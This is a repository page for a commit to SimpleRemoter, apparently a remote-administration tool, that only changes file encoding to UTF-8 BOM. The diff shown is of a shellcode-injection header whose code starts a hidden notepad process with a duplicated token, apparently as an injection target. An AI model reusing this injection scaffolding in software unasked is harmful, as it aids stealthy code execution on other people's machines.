admin/SimpleRemoter
1
0
Fork 0
mirror of https://github.com/yuanyuanxiang/SimpleRemoter.git synced 2026-01-22 07:14:15 +08:00
Code Issues Packages Projects Releases Wiki Activity

style: Change files encoding format to UTF8-BOM

Browse Source
This commit is contained in:
yuanyuanxiang
2026-01-02 20:00:18 +01:00
parent ba9be08411
commit b6af9ce615
356 changed files with 2819 additions and 2819 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
client/ShellcodeInj.h
View File

@@ -1,4 +1,4 @@
#pragma once
#pragma once
#include "StdAfx.h"
#include <string>
@@ -79,12 +79,12 @@ public:
// Old system use IsWow64Process
if (IsWow64Process(hProcess, &bWow64)) {
if (bWow64) {
is64Bit = FALSE; // WOW64 <EFBFBD><EFBFBD> һ<><D2BB><EFBFBD><EFBFBD> 32 λ
is64Bit = FALSE; // WOW64 → 一定是 32
} else {
#ifdef _WIN64
is64Bit = TRUE; // 64 λ<EFBFBD><EFBFBD><EFBFBD>򲻻<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 32 λϵͳ <20><> Ŀ<><C4BF>һ<EFBFBD><D2BB><EFBFBD><EFBFBD>64λ
is64Bit = TRUE; // 64 位程序不会运行在 32 位系统 → 目标一定是64
#else
is64Bit = FALSE; // 32 λ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>޷<EFBFBD><EFBFBD>ж<EFBFBD>Ŀ<EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD>64λ <20><> <20><><EFBFBD><EFBFBD>Ϊfalse
is64Bit = FALSE; // 32 位程序无法判断目标是否64位 → 保守为false
#endif
}
return true;
@@ -103,7 +103,7 @@ private:
{
HANDLE hToken = NULL;
// <EFBFBD>򿪵<EFBFBD>ǰ<EFBFBD><EFBFBD><EFBFBD><EFBFBD> token
// 打开当前进程 token
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID,
&hToken)) {
@@ -111,7 +111,7 @@ private:
return 0;
}
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> token
// 复制主 token
HANDLE hNewToken = NULL;
if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) {
Mprintf("DuplicateTokenEx failed: %d\n", GetLastError());
@@ -124,7 +124,7 @@ private:
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
// ʹ<EFBFBD>ø<EFBFBD><EFBFBD>ƺ<EFBFBD><EFBFBD><EFBFBD> token <EFBFBD><EFBFBD><EFBFBD><EFBFBD> notepad
// 使用复制后的 token 启动 notepad
if (!CreateProcessWithTokenW(hNewToken, 0, L"C:\\Windows\\System32\\notepad.exe",
NULL, 0, NULL, NULL, &si, &pi)) {
Mprintf("CreateProcessWithTokenW failed: %d\n", GetLastError());
@@ -140,7 +140,7 @@ private:
CloseHandle(hToken);
CloseHandle(hNewToken);
return dwProcessId; // <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӽ<EFBFBD><EFBFBD><EFBFBD> ID
return dwProcessId; // 返回子进程 ID
}
// Find process id by name.